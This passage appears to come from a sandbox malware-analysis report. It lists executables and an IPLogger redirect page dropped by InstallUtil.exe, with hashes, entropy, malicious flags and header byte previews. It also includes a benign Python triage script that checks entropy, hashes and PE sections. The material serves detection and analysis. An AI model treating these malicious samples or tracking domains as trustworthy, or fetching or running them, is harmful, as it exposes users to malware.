MD5:9D959BCB3482D418504AF43B76F7A181
SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
Malicious:true
Reputation:unknown
Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........u'.|.t.|.t.|.t...t.|.t...t.|.t...t.|.t...t.|.t.|.t.|.t...t.|.t...t.|.t...t.|.tRich.|.t................PE..L....J.d.....................ZE.....}.............@.................................v.B......................................@.(....pE..x...........RA.................................................................L............................text............................... ..`.rdata....@.......@.................@..@.data...@.....@..(....@.............@....rsrc....HL..pE..z....@.............@..@........................................................................................................................................................................................................................................................................................................................................................................
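The dropped-file records give, for each artifact, an Entropy (8bit) value, an Encrypted flag, and a File Type string that separates a plain PE32 from a UPX-compressed one; the 7446-byte record is not a payload at all but an IPLogger redirect page that InstallUtil.exe wrote to disk, and the 2172545-byte PE32 preview starts with the Borland-style "MZP ... This program must be run under Win32" DOS stub rather than the Microsoft one. The script below is an added example, not part of the Joe Sandbox report or its tooling, that reproduces those checks offline on a downloaded sample: it computes 8-bit Shannon entropy, hashes the buffer, walks the PE section table to spot UPX0/UPX1 sections, recognises the MZP stub, and flags HTML saved where a binary was expected. The entropy cut-off used for the encrypted flag and the build_minimal_pe fixture are the example's own assumptions; the report does not state its threshold (7.98 is reported as not encrypted and 7.99 as encrypted above, so the real cut-off lies somewhere between).

```python
import hashlib
import math
import struct
from dataclasses import dataclass

# Assumption: the report does not state the entropy cut-off behind its
# "Encrypted" flag (7.98 -> false, 7.99 -> true in the records above); the
# threshold below is the example's own choice, not Joe Sandbox's value.
ENCRYPTED_ENTROPY_THRESHOLD = 7.99


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the quantity the Entropy (8bit) field reports."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_section_names(data: bytes) -> list[str]:
    """Section names from the PE section table, or [] if the buffer is not a parsable PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    (num_sections,) = struct.unpack_from("<H", data, e_lfanew + 6)   # COFF NumberOfSections
    (opt_size,) = struct.unpack_from("<H", data, e_lfanew + 20)      # COFF SizeOfOptionalHeader
    table = e_lfanew + 24 + opt_size                                 # first IMAGE_SECTION_HEADER
    names = []
    for i in range(num_sections):
        off = table + i * 40
        if off + 40 > len(data):
            break
        names.append(data[off:off + 8].rstrip(b"\0").decode("ascii", "replace"))
    return names


@dataclass
class Triage:
    kind: str            # "html", "pe", "pe-upx", "pe-delphi-stub" or "unknown"
    entropy: float
    encrypted: bool
    sha256: str
    sections: list[str]


def triage(data: bytes) -> Triage:
    """Classify a dropped file the way an analyst reads the File Type / Entropy / Encrypted fields."""
    head = data.lstrip().lower()
    sections = pe_section_names(data)
    if head.startswith((b"<!doctype html", b"<html")):
        kind = "html"                    # an HTML page where a payload was expected
    elif data[:2] == b"MZ":
        if any(n.upper().startswith("UPX") for n in sections):
            kind = "pe-upx"              # UPX0/UPX1 section names, i.e. "UPX compressed"
        elif data[:3] == b"MZP":
            kind = "pe-delphi-stub"      # Borland/Delphi DOS stub: "MZP ... must be run under Win32"
        else:
            kind = "pe"
    else:
        kind = "unknown"
    ent = shannon_entropy(data)
    return Triage(kind, ent, ent >= ENCRYPTED_ENTROPY_THRESHOLD,
                  hashlib.sha256(data).hexdigest().upper(), sections)


def build_minimal_pe(section_names: list[str], mz: bytes = b"MZ") -> bytes:
    """Constructed fixture (not a loadable binary): DOS header, PE signature, COFF header with
    SizeOfOptionalHeader=0, then one 40-byte section header per name."""
    header = bytearray(0x40)
    header[:len(mz)] = mz
    struct.pack_into("<I", header, 0x3C, 0x40)                      # e_lfanew -> PE signature
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(section_names), 0, 0, 0, 0, 0)
    table = b"".join(n.encode().ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return bytes(header) + coff + table


if __name__ == "__main__":
    samples = {                                                      # all constructed inline
        "iplogger.html": b'<!DOCTYPE html>\n<html lang="" class="html">\n<head>',
        "upx.exe": build_minimal_pe(["UPX0", "UPX1", ".rsrc"]),
        "delphi.exe": build_minimal_pe(["CODE", "DATA", "BSS"], mz=b"MZP"),
        "blob.bin": bytes(range(256)) * 4,                           # flat histogram: 8.0 bits/byte
    }
    for name, data in samples.items():
        t = triage(data)
        print(f"{name:14} {t.kind:16} entropy={t.entropy:.3f} encrypted={t.encrypted} "
              f"sha256={t.sha256[:16]}... sections={t.sections}")
```

Run it against the real drops by replacing the constructed samples with `open(path, "rb").read()`; the SHA-256 field of the report is the value to compare against, since MD5 and SHA1 collide too cheaply to serve as identity for a sample that may have been re-packed between campaigns.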
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.768474988476935
Encrypted:false
SSDEEP:49152:PnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHv:aWqlkLESgCRE/vhOjb05efd6e/oXHv
MD5:D03390586F3419389E3E1E8BDDA44271
SHA1:0D2CDC736DA108BCC5C91FC7E633F5006BAC28F0
SHA-256:83A8D7ED534110EDF3A05E4FDEC58ED4A3C46FFE8C877CBCF47BAC3231982F07
SHA-512:4CBFE5007B9D24B8399DBBA869A42C275F2C68666C5287E769A50154C31D1420B4F6B6FA5A3854186AD5A080485542633A9FB1AF6AEDE93E027210DAFF8DC0DF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
Category:dropped
Size (bytes):2146073
Entropy (8bit):7.982154114080947
Encrypted:false
SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
MD5:4D3AD654117203E9216F6F44480BB6E0
SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
Reputation:unknown
Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.768471767391905
Encrypted:false
SSDEEP:49152:GnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHM:VWqlkLESgCRE/vhOjb05efd6e/oXHM
MD5:A0B6C5CF58F02D6142CF1D604FE17960
SHA1:6E68B57617674727D99CFC1883FEF825A4C17183
SHA-256:D66626CD63607C17D1107176A80FF6C2706F8459056CEB22B46BB1CFEB4906AC
SHA-512:1AD33AA4489092807E2AFDFA17F40EAF4A1EFF738987657FAB2C6DF678CD116CBAC61B86F4D1BAFBBEF8170319D43535FB670D6065495297C34D056E92D64A14
Malicious:true
Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.....b.-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7446
                                                                                                                                                                                                                                Entropy (8bit):5.422209848736349
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
                                                                                                                                                                                                                                MD5:5B423612B36CDE7F2745455C5DD82577
                                                                                                                                                                                                                                SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
                                                                                                                                                                                                                                SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
                                                                                                                                                                                                                                SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html lang="" class="html">.<head>..<title></title>..<meta http-equiv="content-type" content="text/html; charset=utf-8" />..<meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=yes">..<meta name="author" content="Deorg" />..<meta name="copyright" content="Copyright . IPLogger 2010-" />..<meta name="robots" content="index, follow" />..<meta name="revisit-after" content="7 days" />..<meta name="keywords" content="" />..<meta name="description" content="" />...<link rel="shortcut icon" href="https://cdn.iplogger.org/favicon.ico" type="image/x-icon" />...<meta property="og:image" content="https://cdn.iplogger.org/redirect/brand.png" />..<meta property="og:description" content="yip.su is a Branded Short Domain" />..<meta property="fb:app_id" content="232115388491569" />..<meta property="og:image:width" content="285" />..<meta property="og:image:height" content="200" />..<meta property="o
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2146073
                                                                                                                                                                                                                                Entropy (8bit):7.982154114080947
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:LicR35VLbGdkj8PvKuSa5KeSQqJQ75Knd5KfK1j6DmgtP:uE3Ljj8HKQ3ASQd5Ky9ctP
                                                                                                                                                                                                                                MD5:4D3AD654117203E9216F6F44480BB6E0
                                                                                                                                                                                                                                SHA1:8550BF29BBA0A0249630DC6BF3C1BE89745918A6
                                                                                                                                                                                                                                SHA-256:965095C8409C7C8EF498F36BED2DD7FECCAE1DB99E389B17BDFAAC38C2D6D639
                                                                                                                                                                                                                                SHA-512:7FC5B5C4BF010ED59ABB88ADF50F95972E2E702E35D20B30A1F2B524FBBBAA437C6EC676E60A19372B7CBE059C3CFF311D61CEA0A7AE4541E2933471298960D1
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... W............................uC............@........................................... .................................|........J...........................................................................................................text...$........................... .0`.data...............................@.`..rdata..8j.......l..................@.`@.bss......... ........................`..idata..|...........................@.0..ndata..............................@.`..rsrc....J.......L..................@.0.........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2960760
                                                                                                                                                                                                                                Entropy (8bit):7.768477121230768
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:49152:BnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHJ:IWqlkLESgCRE/vhOjb05efd6e/oXHJ
                                                                                                                                                                                                                                MD5:6B0B86FBCD8CE36480951A24F06B16EE
                                                                                                                                                                                                                                SHA1:7790CCEC4F2CDE9E70802743A707C0BED73A139C
                                                                                                                                                                                                                                SHA-256:05F45B7397D13B66D5921B4E13C3C37DA717DC096C349A8AC9A5AACD1DD60D13
                                                                                                                                                                                                                                SHA-512:FD475E18155421F6AB15F57C0A9FD37C10095C29C89D70AFCB80489EA7813209BAD815B1F51C44652094E4B479ACDA362C1EDD6BBEA3E9A9F498C13B0CF14A93
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...)..e..........".......,......`&. .R..p&...R...@...........................S.......-...@..................................pS.......R..............-.x+...qS...............................R.......R.............................................UPX0.....`&.............................UPX1......,..p&..~,.................@....rsrc.........R.......,.............@...4.22.UPX!......^..\l.R..z,..VR.&..xa.!.U..]....U..1.]........SWV.....E.`..@....@.......@d.....d....}...........M.1..U..A.M.).).9..L.M.4.....9.r.9.wx.u..t.SPQ...;..U.....B.......B..M...;}.}<.M...Z.9.r........X$.E...........,......t.....`..A1.CL.1..E....F......w.s..^_[]...>..h......C.......M......U........[......WV....x ..m.u.....1.H^_].F..H..N......5.@8.n??M.@.n..P..@.G~...}..O.<..G.)...p..9.r....9.....pI.SQR.....;.....L}..W......w....;E.}H.._.9.r..E.....E....{..X0.T........u.W.F.E.@...
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):2172545
                                                                                                                                                                                                                                Entropy (8bit):7.994835824960051
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:49152:C9Gl4qgxkoEDHNcaQIkeaxdw2DtAgKHaJwilaHwGkRGr:MGl4qgqrH2TeEdw2DtAgKHaJhaQGkRS
                                                                                                                                                                                                                                MD5:9D959BCB3482D418504AF43B76F7A181
                                                                                                                                                                                                                                SHA1:47DD5A464F2C42405B02AA36A9EABBC5974D27D9
                                                                                                                                                                                                                                SHA-256:E83AD3C722BBECE6957751FE492C203BDFC0BC3AD1542A3943A4767BF547BB66
                                                                                                                                                                                                                                SHA-512:A12DD25FE8ADEA6A8A0AF57710B004968FFE8A1F12E2D5370FEE96C01D03CD72FE06689F187AFDFE465DC83BF6EAA2ECFE9E64130B058A5D56F733F2A2E965F0
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................F....................@..........................@...................@..............................P........,..........................................................................................................CODE....0........................... ..`DATA....P...........................@...BSS......................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Category:dropped
Size (bytes):2960760
Entropy (8bit):7.76847526358866
Encrypted:false
SSDEEP:49152:cnSiPqYQwkkSJiNlwsmSgBmfPl/nJ8UE/JjhhOjbLI/xsAePXdcTC3v3oBXHs:PWqlkLESgCRE/vhOjb05efd6e/oXHs
MD5:F8C33520D6D06C0F3B8C9DE7EFE12DC9
SHA1:8568BA16B1E1ECFE3DBA3AEF2D6187A4D85E221B
SHA-256:7D1D1D76E93C341339533CDECC6E87DE0C56F5DE11EEADCD5AACB70D58153824
SHA-512:3644A16704884149EA1C3B1B2F0691DF21C7F1B55E6E07C56B8E5592D2D130AEF11F40BC19B30366E17360086E65131E3392CF20ECAEADC2C3A26977ED1D6FD7
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):4283784
Entropy (8bit):7.981853182461957
Encrypted:false
SSDEEP:98304:49XSCNlPy0+oWTC7ifvPzHoWNjguEdqMB7o:41SCP6Z3zI4aqMW
MD5:F0A6999F1BC47C6C468CF6DB95003AD5
SHA1:34E2A0E4206D92DA8F328BC87850F6916FDCF1A2
SHA-256:26DB2D4F2338C7301E8B4F1C9C96BBD221DC3C2FF88B1B9B4E253765B8294FDD
SHA-512:26F5978D349704F4A0D32CB5755002721FECF1817393364DD1256F44EC7DFF8EAC6DA68601C209F81837F8A352C846DF0C773E67FA19265843E49B80A691AAA8
Malicious:true
Reputation:unknown
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1460)
Category:dropped
Size (bytes):7446
Entropy (8bit):5.422209848736349
Encrypted:false
SSDEEP:192:HLlX+suv13xV1cSHYu+zogDLIIUOb6z5p7KoxSR1yz:H5X+Dv13T1FH0fHIIP69xKu
MD5:5B423612B36CDE7F2745455C5DD82577
SHA1:0187C7C80743B44E9E0C193E993294E3B969CC3D
SHA-256:E0840D2EA74A00DCC545D770B91D9D889E5A82C7BEDF1B989E0A89DB04685B09
SHA-512:C26A1E7E96DBD178D961C630ABD8E564EF69532F386FB198EB20119A88ECAB2FE885D71AC0C90687C18910CE00C445F352A5E8FBF5328F3403964F7C7802414C
Malicious:false
